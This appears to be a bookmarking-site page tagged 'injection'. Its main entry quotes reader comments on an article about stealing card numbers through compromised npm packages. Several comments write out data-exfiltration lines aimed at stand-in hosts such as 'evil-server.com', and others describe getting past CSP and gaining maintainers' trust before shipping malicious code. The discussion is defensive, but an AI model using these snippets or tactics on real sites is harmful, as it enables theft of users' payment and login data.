recentpopularlog in

injection

« earlier   
I’m harvesting credit card numbers and passwords from your site. Here’s how.
Extremely legit concern.

Comments:

* npm package compromises did happen, e.g.
* https://github.com/conventional-changelog/conventional-changelog/issues/282#issuecomment-365367804
* https://www.bleepingcomputer.com/news/security/somebody-tried-to-hide-a-backdoor-in-a-popular-javascript-npm-package/
* https://www.theregister.co.uk/2017/08/02/chrome_web_developer_extension_hacked/

* Any way to prevent outgoing connections through
`window.open(‘https://legit-analytics.com?q=${payload}', ‘_blank’).close()` with CSP?
A: Wow, didn’t think of that and no, I don’t know if CSP can prevent that.

* "Not just NPM… Think of Joomla extensions or WordPress plugins. A nice way to compromise millions of “traditional” PHP based websites"

* "It isn’t that far from the truth. Something similar is happening already: https://blog.sucuri.net/2017/10/credit-card-stealer-investigation-uncovers-malware-ring.html"

* "Typosquatting attacks apply to any software dependency not just open source and not just npm. Malicious submissions happen in the walled garden Apple App Store and Google Play stores, but since they hold moderation capability centrally and have a large volume of paid staffers, they can do something about it faster than volunteers typically do. A fake WhatsApp app on Google Play store was downloaded by more than 1 million people before it was taken down.

This is definitely a conversation we need to have.

Surprised there was no mention of delayed attacks (e.g., gain trust, gain users, then inject malicious changes in a future version).

Another variation on this would be to approach maintainers (say 10k+ download Firefox or Chrome extension authors, or WordPress authors) and offer them a “custom” advertising program if they just install your code you pay them… maybe your ads seem easy or exceptionally non-intrusive, but that’s because the ads are not the true goal."

* "This is scary and let’s not forget the server side.
Node.js is becoming popular on the server side and backend developers are also using a lot of NPM dependencies without vetting them thoroughly.
For example an Express middleware module should be able to gather the same data and forward it wherever (…and there are a lot of Express middleware modules in the NPM repository).

Although there are perhaps more possibilities on the server side to prevent malicious code from communicating back (for example using network limitations) — I wouldn’t be surprised if most front facing Node.js servers had little limitations to what Internet hosts they could communicate with."

* "you could use webrtc datachannels for sending out data.. it is not affected by CSP at all .. yet..

https://github.com/w3c/webappsec-csp/issues/92"

* "At the end of the day, if you can do document.location = https://evil-server.com/bounce?q=data (e.g. in a form submit event) and bounce back to the original site quickly enough, you can get data out."

* "If the CSP doesn’t define a style-src you could use insertRule to add some css.
e.g. something::after { content:url(“evilserver.com/userdatastring”) }"

* "Yeah, Google Tag Manager scripts are super-dangerous, it’s so easy for someone to push a nasty script targeted at your site one day, then remove it the next."

* Chrome extensions with "Access data on all sites you visit" can easily swap crypto addresses on exchange sites with their own.

* "About npm, I’d add that an easy way to increase the level of trust of a package is to release many ‘patch’ versions per day. This artificially increases the number of downloads, because of the tons of services spending their time to spot package updates (CI tools, stats services and others)."
JavaScript  code  injection  attack  hack  security  against  npm  open-source 
9 weeks ago by dandv
Angular Testing: provide injected @Attribute in TestBed - Stack Overflow
The parameter passed to the constructor is always null. Does anybody know a solution? I'm using Angular 5.2.10.
attribute  angular  injection 
june 2018 by vespertilian
The Beginners Guide to Codecaves - CodeProject
0xCC or 0x00 sections where you can inject your own code
exploitation  code  injection  research  security 
june 2018 by plaxx

Copy this bookmark:





to read